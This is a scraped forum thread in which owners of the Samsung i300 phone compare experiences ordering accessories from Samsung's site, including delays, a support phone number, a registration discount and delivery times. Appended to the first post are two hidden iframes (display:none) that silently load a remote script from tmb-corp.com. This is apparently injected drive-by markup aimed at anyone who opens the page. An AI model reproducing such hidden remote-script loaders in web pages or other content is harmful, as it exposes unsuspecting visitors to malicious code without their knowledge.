+ Reply to Thread

Accessories

After waiting for the out of stock car power adapter and data cable from Sprint, I have ordered the IN-STOCK accessories direct from Samsung. Different phone, same story from SPCS having no accessories. Shipping's not free like with Sprint but Samsung does not charge tax. Thank goodness they've not restricted Samsung from selling direct to their consumers. Still is seems like a missed business opportunity to Sprint - they probably make more off the accesories than they do the handests.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Angry Anyone order from Samsungusa.com???

I ordered a number of outrageously priced accessories from Samsungusa.com 3 weeks ago and haven't received anything. After the order was placed, I received a quick auto-response e-mail saying that more shipping information would follow. I haven't seen anything since and when I replyed to the e-mail, it wasn't a valid address.

I can't find any phone number on the website to talk to a customer service rep.

Does anyone have their phone #?

Thanks. -- John

i300 knucklehead

great

I got the 20% off deal for registering my phone online, the same follow-up message too. I just did it today, I will keep you posted. I got the cradle for $48 and the samsung earpiece thingy for $16. With the discount it isn't so unreasonable.

Yeah, they didn't have the 20% offer when I ordered. Assuming I can actually talk to someone, I'll either ask for the 20% deal or cancel the order. Please let me know if you get a valid e-mail or phone contact. -- John

I ordered from them a few months ago (sorta) and they shipped the items out ASAP. I remember on one of the pages there was a phone number, which I used to order the accessories. I think I found the phone number by going through the ordering process right until you actually purchase the item. Don't quite remember all the details though.

My first order was not impressive. I got the typical emails, then nothing. I called them and they said my AMEX card didn't go through. Called AMEX, who said Samsung was sending incomplete electronic charge requests. After much haggling, Samsung agreed to call AMEX, they fixed the problem and I got the stuff next day. Bottom line....I had to troubleshoot the transaction failure. I'm hoping they do better next time.....
    Dr. Dan

my products arived fine. but, trying to figure out when they would arrive was a huge PITA - horrible order support (aka NO response...), NO notice when the products would arrive, etc.

basically, before you place your order, be really sure that's what you want....
    Cliff

i300 User
    Here is the number: 1-888-987-4357, Option #1

Talk to Rona or Mandi if they are around, but anyone can take your order.

I have ordered off the site several times and received product promptly, but I always get my stuff 2nd-Day air (+$9.95).

The 20% off only applies if you register your phone online at Samsung - here is the link for doing that:

http://www.samsungtelecom.com/produc...y_sphi-300.asp

Sorry to hear about your bad experience - I hope other users post their experiences so we can tell if my story was the exception.

Good Luck!

gf

Glen, and all,

Thanks for the #. I called them, and despite having been e-mailed a confirmation #, they had no record of my order.

I've reordered and this time got the 20%.

Now to find a decent case...

-- John

I ordered the car charger at 20% off for registering the phone and it arrived less than a week later. Good service.

The help number listed on the invoice is: 1-888-987-4357

Hope this helps

I've ordered most of my accessories through the Samsung USA site with good success. My car charger stopped working after a month and they are replacing. Ordered an extended battery last Thursday with the discount and Samsung shipped it on Monday.

Ordered the E and B case on the advice of folks on the board (1/7) and am sorry to say it's still b.o. They are prompt and apologetic but this is crazy...

Administrator

Arrow

Originally posted by allaboutduncan
    I ordered the car charger at 20% off for registering the phone and it arrived less than a week later. Good service.

The help number listed on the invoice is: 1-888-987-4357

Hope this helps

how much was it with the disocunt and shipping?

The charger was $23.99 shipped.

Administrator

Arrow

ahh. thanks for the info...

Thought I should pass this link to everyone. This guy on ebay is selling everything included in the I300 package sans the I300. I just received my package which includes 2 batteries, a cradle, a stylus, and a case. The typical winning bid is roughly $100 which ain't bad. I think I won my auction on Saturday and received it today and told him I'd let others know. Here's the link to his current auction. ( he has 2 auctions)

BTW - rest assured that this is not me selling these. Its only coincidence that this fellow is from Chicago as well.

Auction

Just ordered the data cable on the website...$40 shipping included. Will let you know when I get it. BTW, I immediately got a confirmation email with a link provided if I had any questions. The link was http://www.samsungtelecom.com/contac...ccessories.asp
    They also said I could just reply to their email. Cheers!!

John

Thumbs up

Well, I ordered the data cable on the 9th and I received it today (the 14th) and I am located in Alaska!! Needless to say, this was a VERY positive experience. Cheers!

John